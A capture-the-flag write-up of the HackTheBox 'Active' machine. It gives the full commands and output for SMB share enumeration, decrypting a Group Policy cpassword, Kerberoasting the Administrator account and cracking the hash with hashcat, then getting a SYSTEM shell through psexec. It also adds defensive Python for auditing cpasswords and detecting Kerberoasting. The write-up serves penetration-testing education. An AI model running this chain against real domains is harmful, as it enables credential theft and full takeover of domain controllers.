Active-Writeup
Table of contents
Skills
- SMB enumeration
- gpp-decrypt - Windows AES key
- Kerberoasting attack - user Administrator
- psexec - connect as user Administrator
Reconnaissance
We are going to do the Active machine from HackTheBox, so let's create the directories to organize the information.
$ mkdir Active-10.10.10.100
$ cd Active-10.10.10.100
$ mkdir nmap exploit content
Then we run an nmap scan to see which ports are open on the target machine.
$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.100 -oG allPorts
I export it in grepable format because I have a function called extractPorts -> (link to the extractPorts utility created by s4vitar; xclip needs to be installed)
$ extractPorts allPorts
[*] Extracting information...
[*] IP Address: 10.10.10.100
[*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172
[*] Ports copied to clipboard
We see several open ports, so let's run a more thorough scan on them.
$ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172 10.10.10.100 -oN targeted
# Nmap 7.93 scan initiated as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172 -oN targeted 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-09 09:59:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4h00m08s
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-09T10:00:27
|_ start_date: 2023-08-09T05:36:33
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Let's start by launching crackmapexec to scan SMB on port 445.
$ crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
We see a domain, active.htb; let's add it to "/etc/hosts".
$ cat /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 parrot
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# Others
10.10.10.100 active.htb
Let's check whether any files are shared over SMB.
$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk           Permissions    Comment
----           -----------    -------
ADMIN$         NO ACCESS      Remote Admin
C$             NO ACCESS      Default share
IPC$           NO ACCESS      Remote IPC
NETLOGON       NO ACCESS      Logon server share
Replication    READ ONLY
SYSVOL         NO ACCESS      Logon server share
Users          NO ACCESS
We have read permission on Replication; let's check what it contains.
$ smbmap -H 10.10.10.100 -r Replication
[+] IP: 10.10.10.100:445 Name: active.htb
Disk           Permissions    Comment
----           -----------    -------
Replication    READ ONLY
.\Replication\*
dr--r--r--    0 Sat Jul 21 06:37:44 2018    .
dr--r--r--    0 Sat Jul 21 06:37:44 2018    ..
dr--r--r--    0 Sat Jul 21 06:37:44 2018    active.htb
We see an active.htb directory. Instead of downloading things one by one, let's download everything recursively (note: just press Enter when prompted for the password).
$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\dh89]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (1,9 KiloBytes/sec) (average 0,6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0,4 KiloBytes/sec) (average 0,6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1,4 KiloBytes/sec) (average 0,7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4,4 KiloBytes/sec) (average 1,1 KiloBytes/sec)
smb: \>
Let's look at what we downloaded over SMB.
$ ls
active.htb content exploit nmap
$ cd active.htb
$ tree
.
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts
We see an .xml file; let's take a look at it.
$ cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We see a password, but it is encrypted, in this case as a GPP (Group Policy Preferences) cpassword. This is dangerous because Microsoft itself published the AES key used to encrypt these values, so for us decrypting it is no problem at all.
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
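As an added defender-side example (not code from the original writeup), this audit walks a SYSVOL tree (or the smbclient download above) and flags every GPP file that still carries a cpassword attribute, since any such value is readable by every domain user and decryptable with the public key. The sample XML and the "helpdesk" account are constructed to mirror the Groups.xml layout seen on this box; the cpassword value is a placeholder.

```python
import os
import xml.etree.ElementTree as ET

# GPP XML files that can carry a cpassword attribute (Groups.xml is the one found on this box).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample mirroring the Groups.xml layout found under Policies on this box.
# The cpassword value below is a placeholder, not the real one.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" cpassword="PLACEHOLDER_CPASSWORD" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\helpdesk">
    <Properties action="U" neverExpires="0" acctDisabled="1" userName="active.htb\\helpdesk"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_text):
    """Return one finding per element carrying a non-empty cpassword attribute.
    Any such attribute is a finding: the AES key protecting it is public, so the
    value is equivalent to a cleartext password stored in a world-readable share."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if not cpw:
            continue
        # Different GPP files name the account attribute differently.
        account = (elem.get("userName") or elem.get("username")
                   or elem.get("runAs") or elem.get("accountName"))
        findings.append({
            "userName": account,
            "action": elem.get("action"),
            "neverExpires": elem.get("neverExpires") == "1",
            "cpassword_len": len(cpw),
        })
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL (or smbclient download) tree and audit every GPP file in it.
    Returns {file_path: findings}; files that hold no cpassword map to []."""
    report = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8") as fh:
                    report[path] = find_cpasswords(fh.read())
    return report
```

The fix is not rotating the password but removing the preference item entirely and changing the account password, since the old XML may still live in backups and DFSR conflict folders.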
The user is svc_tgs (it appears in the same file); let's validate the credential with crackmapexec.
$ crackmapexec smb 10.10.10.100 -u svc_tgs -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
It shows a '[+]' but no Pwn3d!, and since port 5985 is not open we cannot connect via WinRM. So we use these credentials to connect over SMB and LDAP, but we find nothing of interest.
Privilege Escalation
At this point I thought of performing a Kerberoasting attack, since I now hold a valid credential (link with more info on the Kerberoasting attack -> hacktricks)
$ date --set "$(net time -S 10.10.10.100)"
vie 11 ago 2023 05:30:28 -04
$ impacket-GetUserSPNs -request active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-11 01:39:21.761759
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$3bd21142fb87b9b15387280fda3ce9bb$a71d0d2836501b50f6f867592b83156d2d7e912d5ae25b300826f08dadb07a49f7eb775d47208757c2011e2524215eb3fb99fde4396008a6c248b459f804ac80367d89e3990a673b87329804de9da406044ec0c48cf33a05b491d7ca7c1ca8863365feb23fae64d3b7f7b7a8f5f1e93860a5baf5493151017e297d788bc819e69997bea68b9d95501ae25eeb7b71b6c793f93a8a9a113ac0e22ea1ea0117420a579a98773d480d197a756017c5a09661d6e0b1dea30da49c974f831cbc20a642be37c32a3f5c9a54a7183c213c743e1d463d2c2b47ebc07104492e5263bcc9b7accadc1b74963c083116cb3308a0e05752af3a47394fbf05304e1eb5f6d155cf24b86567b51bdc4321bbeb7f2e27786b265c94a1fb2e12ffd8a25d0fce365226f64e53a40deaceb307d4dfe4bfe0c0e20332a4ea956c0678fc70f723d478bd3410459b4393d8ee9651befd098ccce6031f78f835caf994538aa072fb661f95b7700e7bf9ff786625bb0162a7791bda4dc323b4eded7ac6f9db823ed7ce0209f6c769d7c3562a0834cdfbbed12251375fe38f12aebf0cb872a0be7087f3d92303e81a6ef088dc62843003cc16bf7a568971ba4fd92e3a168a527dad4c13985c11e71a6a1365859bbaa16db17bae2c57e474a82b210ec8f7f00fea53db0d8da8882eeb54f855f380c36be212513587c20fd3a5cecb224e39d46610c341ff99761531d3141d54e0e621ddcd9f12b72406a08840014dc341a1009f536d3da43b897c1a2a3b40d168c0117821f118c985f4d7e027e49f535940bc64f5a8c8e1e34aca67e99116edef3f94a9918cc7c8744abed25dc9aef0dc9b1fa47f9e45bd5f7cb4093f92095ca003958e6720c38791aeee32eb6e9fa49951ddc26e23ca8b692c658ef564f035611f1beb1447e39fbdc3e97575e73628e2dfb52d6be0d0bd7b273776c6c6af562dfa4ace86272740d843446af5f34df88d3fb24baded199714cd65118b4956cb7ddfb925e3d859ae8cfe4369a5042b046db04e07e3fe0e27988675d5a32d28e285f6b091ee126ab651229326e388a461bf18468fc6dd1aa69e927f640c028c0a937808897247533c0f2e71497ac35dcfc4382b2240d0cec14bee35e90c74e79506e43c92eb2b6ea47caa88854e4113ab7f572aa231710f184e87b383ce9aa56e3a3ef22f6d59edb37b60d0280fac4b2514db36a60d804c59c89688133accb4d3c9caf56bcfcbf8b5b979cc83f79beb47c960332665
We see that the user Administrator is vulnerable to a Kerberoasting attack (it has the SPN active/CIFS:445 registered, so any authenticated domain user can request a service ticket for it). Let's copy the hash and try to crack it with hashcat; the mode is 13100, which corresponds to "Kerberos 5, etype 23, TGS-REP".
$ cat ../content/hash
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$3bd21142fb87b9b15387280fda3ce9bb$...
$ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ....
After a while, we find that the password is "Ticketmaster1968". Let's validate it with crackmapexec.
$ crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
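As an added detection example (not part of the original writeup), the request made by GetUserSPNs above leaves a Security event 4769 on the DC whose TicketEncryptionType is 0x17 (RC4, the etype 23 that hashcat mode 13100 cracks) for a user account rather than a machine account. The events below are constructed with the real 4769 field names; the source IP and the extra records are hypothetical.

```python
# Constructed sample of Windows Security event 4769 (Kerberos service ticket requested)
# records, using the real 4769 field names. Values are hypothetical, modelled on this box.
SAMPLE_4769_EVENTS = [
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::1"},
]

RC4_HMAC = 0x17  # Kerberos etype 23; AES types (0x11/0x12) are not cheaply crackable

def kerberoast_candidates(events):
    """Flag 4769 events where a user account (not a machine or krbtgt account) had a
    service ticket issued with RC4 encryption. That combination is what produces the
    $krb5tgs$23$ hash shown above, so each hit is a ticket that can be cracked offline."""
    hits = []
    for ev in events:
        svc = ev.get("ServiceName", "")
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        if etype != RC4_HMAC:
            continue
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits.append({"requester": ev["TargetUserName"],
                     "service_account": svc,
                     "source": ev["IpAddress"]})
    return hits

def rc4_tickets_per_requester(hits):
    """Count distinct service accounts each principal pulled RC4 tickets for; one
    account requesting tickets for many SPN-bearing users in a burst is the usual
    Kerberoasting signature (GetUserSPNs -request does this for every SPN it finds)."""
    seen = {}
    for h in hits:
        seen.setdefault(h["requester"], set()).add(h["service_account"])
    return {requester: len(accounts) for requester, accounts in seen.items()}
```

The mitigation side is the mirror image: give SPN-bearing accounts long passwords (or use gMSAs) and set them to AES-only so no RC4 ticket is issued in the first place.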
And we see the (Pwn3d!); now we can use psexec to gain access to the target machine.
$ impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file cYWeJIsc.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service STVf on 10.10.10.100.....
[*] Starting service STVf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Conclusions
I liked the Active machine from HTB; it is the first time we cracked something thanks to the AES key. As always, I hope the machine helps you learn. You know you have the comments, or you can contact me on Discord with any questions.